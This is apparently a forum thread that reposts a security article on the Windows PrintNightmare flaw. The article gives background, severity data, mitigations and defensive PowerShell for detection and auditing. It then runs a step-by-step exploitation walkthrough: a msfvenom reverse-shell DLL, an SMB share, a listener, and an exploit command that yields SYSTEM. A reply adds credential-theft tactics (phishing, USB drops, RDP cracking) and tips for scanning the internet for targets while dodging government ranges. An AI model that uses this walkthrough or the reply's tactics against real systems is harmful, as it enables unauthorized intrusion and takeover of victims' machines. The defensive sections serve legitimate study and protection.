PrintNightmare Vulnerability | CVE 2021-1675 & CVE-2021-34527
#1

Source: Safe Security
Author(s): Divya Bora, Mayank Dholia, Siddhi Verma
INTRODUCTION
Quote: Originally thought to be a local privilege escalation vulnerability in the Windows Print Spooler, the issue was identified as CVE-2021-1675 and patched in Microsoft's June 2021 Patch Tuesday release. On June 21 Microsoft raised its severity and reclassified it as remote code execution (RCE). The RCE vulnerability was subsequently assigned a new identifier, CVE-2021-34527.

Print Spooler:
Print Spooler is a native, built-in Windows service, enabled by default on Windows machines to manage printers and print servers, and is therefore prevalent throughout enterprise IT estates.

Print Spooler service:
Monitoring the spooler process, spoolsv.exe, can surface suspicious activity such as rundll32.exe being spawned to load a malicious DLL, or Windows utilities being launched from the spooler as part of privilege escalation or reconnaissance.
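As an added example (not part of the original article), the following PowerShell runs toy detection logic over a handful of constructed event records that mimic the shape of Sysmon entries (Event ID 1 process creation, Event ID 7 image load) and Microsoft-Windows-PrintService/Operational entries (Event ID 316 driver added, Event ID 808 plug-in load failure). The records, file names and the `Find-SpoolerAnomaly` function are made up for the demo; only the field names follow the Sysmon and PrintService schemas.

```powershell
# Added example, not from the original article: flag spoolsv.exe behaviour that
# matches PrintNightmare-style driver abuse. Events below are constructed for
# the demo; in production they come from Get-WinEvent (see the note after the block).

$SampleEvents = @(
    # Benign: spooler loads a signed Microsoft core driver file
    [pscustomobject]@{ Provider = 'Microsoft-Windows-Sysmon'; Id = 7
        Image = 'C:\Windows\System32\spoolsv.exe'
        ImageLoaded = 'C:\Windows\System32\spool\DRIVERS\x64\3\UNIDRV.DLL'
        Signed = 'true'; Signature = 'Microsoft Windows' }
    # Suspicious: spooler loads an unsigned DLL that just appeared in the driver store
    [pscustomobject]@{ Provider = 'Microsoft-Windows-Sysmon'; Id = 7
        Image = 'C:\Windows\System32\spoolsv.exe'
        ImageLoaded = 'C:\Windows\System32\spool\DRIVERS\x64\3\new\evil.dll'
        Signed = 'false'; Signature = '' }
    # Suspicious: spoolsv.exe spawning rundll32.exe as SYSTEM
    [pscustomobject]@{ Provider = 'Microsoft-Windows-Sysmon'; Id = 1
        ParentImage = 'C:\Windows\System32\spoolsv.exe'
        Image = 'C:\Windows\System32\rundll32.exe'
        CommandLine = 'rundll32.exe C:\Windows\System32\spool\DRIVERS\x64\3\new\evil.dll,Run'
        User = 'NT AUTHORITY\SYSTEM' }
    # Benign: the spooler's own isolation host is an expected child process
    [pscustomobject]@{ Provider = 'Microsoft-Windows-Sysmon'; Id = 1
        ParentImage = 'C:\Windows\System32\spoolsv.exe'
        Image = 'C:\Windows\System32\PrintIsolationHost.exe'
        CommandLine = 'C:\Windows\System32\PrintIsolationHost.exe -Embedding'
        User = 'NT AUTHORITY\SYSTEM' }
    # PrintService: a driver was added and the file list carries a stray DLL
    [pscustomobject]@{ Provider = 'Microsoft-Windows-PrintService'; Id = 316
        Message = 'Printer driver 1234 for Windows x64 Version-3 was added or updated. Files:- UNIDRV.DLL, kernelbase.dll, evil.dll. No user action is required.' }
    # PrintService: the spooler tried to load a DLL from the driver store and failed
    [pscustomobject]@{ Provider = 'Microsoft-Windows-PrintService'; Id = 808
        Message = 'The print spooler failed to load a plug-in module C:\Windows\system32\spool\DRIVERS\x64\3\evil.dll, error code 0x45A.' }
)

# Children the spooler starts in normal operation; anything else is flagged,
# well-known LOLBins at High severity.
$ExpectedChildren = @('printisolationhost.exe', 'splwow64.exe', 'printfilterpipelinesvc.exe')
$LolbinChildren   = @('rundll32.exe', 'cmd.exe', 'powershell.exe', 'regsvr32.exe', 'mshta.exe')

function Find-SpoolerAnomaly {
    param([Parameter(Mandatory)][object[]]$Events)
    foreach ($e in $Events) {
        $sev = $null; $why = $null
        if ($e.Provider -eq 'Microsoft-Windows-Sysmon' -and $e.Id -eq 1 -and
            $e.ParentImage -like '*\spoolsv.exe') {
            # Compare on the file name only; split on backslash so it also works on pwsh/Linux
            $child = (($e.Image -split '\\')[-1]).ToLowerInvariant()
            if ($child -notin $ExpectedChildren) {
                $sev = if ($child -in $LolbinChildren) { 'High' } else { 'Medium' }
                $why = "spoolsv.exe spawned $child as $($e.User): $($e.CommandLine)"
            }
        } elseif ($e.Provider -eq 'Microsoft-Windows-Sysmon' -and $e.Id -eq 7 -and
                  $e.Image -like '*\spoolsv.exe' -and
                  $e.ImageLoaded -like '*\spool\drivers\*' -and $e.Signed -ne 'true') {
            $sev = 'High'
            $why = "spoolsv.exe loaded unsigned module $($e.ImageLoaded)"
        } elseif ($e.Provider -eq 'Microsoft-Windows-PrintService' -and $e.Id -eq 316) {
            # Driver installs are rare on endpoints; carry the file list for triage.
            $files = if ($e.Message -match 'Files:-\s*(?<files>.+?)\.\s') { $Matches.files } else { '?' }
            $sev = 'Medium'
            $why = "printer driver added/updated, files: $files"
        } elseif ($e.Provider -eq 'Microsoft-Windows-PrintService' -and $e.Id -eq 808) {
            $sev = 'High'
            $why = "spooler failed to load a plug-in module: $($e.Message)"
        }
        if ($sev) {
            [pscustomobject]@{ Severity = $sev; EventId = $e.Id; Reason = $why }
        }
    }
}

# Expected: four hits (two High from Sysmon, one Medium 316, one High 808); the
# signed UNIDRV.DLL load and the PrintIsolationHost child are not reported.
Find-SpoolerAnomaly -Events $SampleEvents | Sort-Object Severity | Format-Table -AutoSize
```

To run this against a live host, replace `$SampleEvents` with records built from `Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1, 7 }` (mapping each event's `.Properties` to the field names above) and from the Microsoft-Windows-PrintService/Operational log, which is disabled by default and has to be enabled before it records anything.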

Elevation of Privilege Vulnerability:
An elevation of privilege vulnerability lets an attacker gain privileges beyond those intended for the user. Although PrintNightmare has been upgraded from a local elevation of privilege vulnerability to a remote code execution (RCE) threat, exploitation still requires the attacker to hold credentials for a domain-connected user account within the target network.

Print-Nightmare:
PrintNightmare is an authorization bypass in the Windows Print Spooler service: an authenticated user can install a printer driver through the RpcAddPrinterDriverEx() remote procedure call, and the spooler loads the attacker-supplied DLL as the local SYSTEM account. An attacker who exploits this runs arbitrary code as SYSTEM and can then install programs; view, change, or delete data; or create new accounts with full user rights.
VULNERABILITY SEVERITY
CVSS v3:
Base Score: 8.8 (HIGH)
Vector (as published by Microsoft and NVD): CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Impact Score: 5.9
Exploitability Score: 2.8

Scope of Impact:
Microsoft reports that 'all versions of Windows' are affected, across multiple architectures and releases, with the following being explicitly listed:
  • Windows Server 2008 SP2 (32-bit & x64) (including Server Core installation)
  • Windows Server 2008 R2 SP1 (x64) (including Server Core installation)
  • Windows Server 2012 (including Server Core installation)
  • Windows Server 2012 R2 (including Server Core installation)
  • Windows Server 2016 (including Server Core installation)
  • Windows Server 2019 (including Server Core installation)
  • Windows Server, versions 1909, 2004 & 20H2 (Server Core installation)
  • Windows 7 SP1 (32-bit & x64)
  • Windows 8.1 (32-bit & x64)
  • Windows RT 8.1
  • Windows 10 (32-bit & x64)
  • Windows 10, version 1607 (32-bit & x64)
  • Windows 10, versions 1809, 1909, 2004, 20H2 & 21H1 (32-bit, ARM64 & x64)
MITIGATION
To determine whether the Print Spooler service is running, use the following command:
Code:
Get-Service -Name Spooler

If the Print Spooler is running, or if the service is not set to Disabled, choose one of the following options: either disable the Print Spooler service, or disable inbound remote printing through Group Policy:

Option 1 - Disable the Print Spooler service
Use the following PowerShell commands (recommendation from Microsoft):
Code:
Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled

or disable the Spooler service via the registry:
Code:
Stop-Service Spooler
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start" /t REG_DWORD /d "4" /f

or uninstall the Print-Services role (Windows Server only):
Code:
Uninstall-WindowsFeature Print-Services
This will disable the ability to print both locally and remotely.

Option 2 - Disable inbound remote printing through Group Policy
You can also configure the settings via Group Policy as follows:
Code [No Highlight]:

Computer Configuration / Administrative Templates / Printers

Set the "Allow Print Spooler to accept client connections" policy to Disabled to block remote attacks.

This policy will block the remote attack vector by preventing inbound remote printing operations. The system will no longer function as a print server, but local printing to a directly attached device will still be possible.
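The options above are manual steps; as an added example (not part of the original article), the PowerShell below audits one host against them in a single pass: the spooler's state (Option 1), the registry value behind the "Allow Print Spooler to accept client connections" policy (Option 2), and the Point and Print policy values that decide whether a non-administrator can have a driver installed at all. The function names are my own; the registry paths and value names are the real ones behind those policies. Run it in an elevated PowerShell on the host being checked; it does not verify the patch level.

```powershell
# Added example, not from the original article: audit one Windows host for
# PrintNightmare exposure and optionally apply the registry equivalent of Option 2.
# Function names are mine; registry paths/values are those behind the
# "Allow Print Spooler to accept client connections" and "Point and Print
# Restrictions" policies. Requires an elevated PowerShell on Windows.

$PrintersPolicy   = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers'
$PointAndPrintKey = "$PrintersPolicy\PointAndPrint"

function Get-RegValue {
    param([string]$Path, [string]$Name)
    # Returns $null when the key or value does not exist (policy "not configured").
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -ne $item) { $item.$Name } else { $null }
}

function Get-PrintNightmareExposure {
    [CmdletBinding()]
    param()
    $findings = [System.Collections.Generic.List[object]]::new()
    $add = { param($Sev, $Check, $Detail)
        $findings.Add([pscustomobject]@{ Severity = $Sev; Check = $Check; Detail = $Detail }) }

    # 1. Service state (Option 1). Domain controllers have no business running a spooler.
    $svc  = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    $role = (Get-CimInstance -ClassName Win32_ComputerSystem).DomainRole   # 4 or 5 = domain controller
    $isDc = $role -ge 4
    if ($null -eq $svc) {
        & $add 'Info' 'Spooler service' 'Print Spooler is not installed'
    } elseif ($svc.Status -eq 'Running' -or $svc.StartType -ne 'Disabled') {
        $sev = if ($isDc) { 'High' } else { 'Medium' }
        & $add $sev 'Spooler service' "Status=$($svc.Status) StartType=$($svc.StartType)$(if ($isDc) { ' on a domain controller' })"
    } else {
        & $add 'OK' 'Spooler service' 'Stopped and disabled'
    }

    # 2. Option 2: RegisterSpoolerRemoteRpcEndPoint = 2 means client connections are refused.
    $rpc = Get-RegValue $PrintersPolicy 'RegisterSpoolerRemoteRpcEndPoint'
    if ($rpc -eq 2) {
        & $add 'OK' 'Remote client connections' 'Policy disables inbound printing'
    } elseif ($svc -and $svc.Status -eq 'Running') {
        $shown = if ($null -eq $rpc) { 'not configured' } else { $rpc }
        & $add 'Medium' 'Remote client connections' "Policy not set to Disabled (value: $shown)"
    }

    # 3. Point and Print: values that weaken these re-open driver installation to
    #    non-admins even on a patched host.
    $noWarn   = Get-RegValue $PointAndPrintKey 'NoWarningNoElevationOnInstall'
    $upd      = Get-RegValue $PointAndPrintKey 'UpdatePromptSettings'
    $restrict = Get-RegValue $PointAndPrintKey 'RestrictDriverInstallationToAdministrators'
    if ($noWarn -eq 1) { & $add 'High' 'Point and Print' 'NoWarningNoElevationOnInstall=1 (security prompt disabled)' }
    if ($upd -eq 1 -or $upd -eq 2) { & $add 'High' 'Point and Print' "UpdatePromptSettings=$upd (driver update prompt weakened)" }
    if ($restrict -eq 0) { & $add 'High' 'Point and Print' 'RestrictDriverInstallationToAdministrators=0 (non-admins may install drivers)' }
    if ($noWarn -ne 1 -and ($null -eq $upd -or $upd -eq 0) -and $restrict -ne 0) {
        & $add 'OK' 'Point and Print' 'No weakening values present'
    }
    return $findings
}

function Disable-SpoolerRemoteConnections {
    # Registry equivalent of Option 2; the spooler must be restarted for it to take effect.
    [CmdletBinding(SupportsShouldProcess)]
    param()
    if ($PSCmdlet.ShouldProcess('Print Spooler', 'Refuse remote client connections')) {
        New-Item -Path $PrintersPolicy -Force | Out-Null
        Set-ItemProperty -Path $PrintersPolicy -Name RegisterSpoolerRemoteRpcEndPoint -Value 2 -Type DWord
        Restart-Service -Name Spooler -Force
    }
}

Get-PrintNightmareExposure | Format-Table -AutoSize
# Preview the Option 2 change without applying it:
Disable-SpoolerRemoteConnections -WhatIf
```

The Point and Print check matters because the July 2021 update only blocks non-administrator driver installation when those policy values have not been relaxed; a host that is fully patched but carries NoWarningNoElevationOnInstall=1 still accepts the driver.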

Option 3 - Install the Windows security update
Install the July 2021 out-of-band security update for CVE-2021-34527 (and every later cumulative update) on all affected systems. The update alone is not a complete fix if driver installation policy has been weakened: check that, under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint, NoWarningNoElevationOnInstall and UpdatePromptSettings are 0 or absent and RestrictDriverInstallationToAdministrators is not 0; otherwise the patched spooler still lets non-administrators install drivers.

Option 4 - Restrict content access
Note: this option and the shadow copy cleanup below are Microsoft's workaround for a different July 2021 issue, CVE-2021-36934, in which the SAM and other hive files under %windir%\system32\config are readable by non-administrators. They do not close PrintNightmare but were widely published alongside it and are kept here for completeness.
Restrict access to the contents of "%windir%\system32\config" with the following command:

Command Prompt (Run as administrator):
Code:
icacls %windir%\system32\config\*.* /inheritance:e

Windows PowerShell (Run as administrator):
Code:
icacls $env:windir\system32\config\*.* /inheritance:e

Delete Volume Shadow Copy Service (VSS) shadow copies. First identify whether shadow copies exist with:

Command Prompt or PowerShell (Run as administrator):
Code:
vssadmin list shadows

Delete any shadow copies and System Restore points that existed before access to the contents of %windir%\system32\config was restricted; the old copies still carry the readable hive files.
EXPLOIT IMPLEMENTATION
Attack Scenario:
We will look at a scenario in which a target machine runs the vulnerable Windows service, the Print Spooler, inside a virtual environment built with VMware.

In this scenario we use the PrintNightmare exploit to get Remote Code Execution (RCE) on the victim machine, delivering a malicious DLL that the vulnerable Print Spooler service loads.

For this practical we will need:
  • A target machine running an unpatched, vulnerable Windows version (no shadow copy is needed for this exploit).
  • The Print Spooler service up and running on the target machine.
  • A Kali Linux machine to reach the target system and exploit the vulnerability.
EXPLOITATION
  1. Check the state of the vulnerable service, the Print Spooler. Although it is a built-in Windows service, it may have been disabled, so run the following in PowerShell on the victim to confirm it is running:
    Code:
    Get-Service -Name Spooler

    [Image: byyelc.PNG]
    Note: If the service is not running then we can use following command to start it:
    Code:
    Start-Service -Name Spooler

  2. Download the exploitation script. The exploit is publicly available on the internet, you can use the following git repository to download the script: https://github.com/nemo-wq/PrintNightmar...2021-34527

    [Image: exgkxn.PNG]

  3. Making the reverse shell DLL file using msfvenom. We require an arbitrary DLL file which will be executed by the Print Spooler Service, due to the bug present in that service (to gain the system access).

    Code:
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker ip> LPORT=<attacker listening port> -f dll -o output_file.dll
    [Image: gaylip.PNG]

  4. Start the SMB Server. To get the DLL file executed by the Print Spooler Service on the victim, we need to make it accessible by hosting it on the network. For that we can use SMB Server.

    Code:
    python3 smbserver.py share /path/to/dll/ -smb2support
    [Image: oamfai.PNG]

    Note: Make sure the SMB server allows anonymous access (see the git repository mentioned in Step 2).

    To get the smbserver.py file, you need to install impacket from the following repository: https://github.com/cube0x0/impacket

  5. Start the reverse listener on the attacker machine. Since we are using a meterpreter payload in the demonstration, we need to start a listener in msfconsole (you can also use netcat if you are using a simple shell payload).

    In msfconsole, use exploit/multi/handler, set PAYLOAD to the payload used in step 3 and LHOST/LPORT to the values given to msfvenom, then run the listener.

    [Image: cwyecm.PNG]

  6. To execute the exploit use the following command:

    Code:
    python3 exploit.py [domain/]username:"password"@victim_ip '\\attacker_ip\share\evil.dll'
    [Image: jktgir.PNG]

    Note: the exploit needs valid domain user credentials, and the DLL name in the UNC path must match the file produced in step 3.

    If you are getting any errors, make sure your smb server is configured correctly.

  7. Get the reverse connection on the listener. After performing the steps correctly as demonstrated, you will get a reverse connection (in our case it is a meterpreter connection).

    [Image: hzydsw.PNG]

Result:

We have acquired NT AUTHORITY\SYSTEM on the target machine, the most powerful account on a local Windows instance.
[Image: kwwmwf.PNG]
#2
Extra resources
Metasploit fundamentals: https://www.offensive-security.com/metas...damentals/
AV Bypass with Metasploit Templates and Custom Binaries: https://www.ired.team/offensive-security...-templates
There's also plenty of other good threads on AV evasion in the malware section & reverse engineering section.

Ideas to acquire Windows credentials for domains/servers:
- Phishing/Spear Phishing
- Physical attacks: For example mimikatz, dropping around USBs in office lobbies/parking lots, sending disguised USBs (See: https://www.zdnet.com/article/fbi-cyberc...ansomware/)
- Cracking open RDP access. Many admins use bad/common passwords. (Google for more info) but beware of honeypots.
- etc

Where to find RDP/Windows servers:
- Scan the internet with tools such as Nmap or Masscan (Beware of dangerous govt IP ranges though). Probably a good idea to look up default ports for RDPs in that case too.
- Use OSINT search engines such as Shodan.
- etc

Just throwing out some ideas.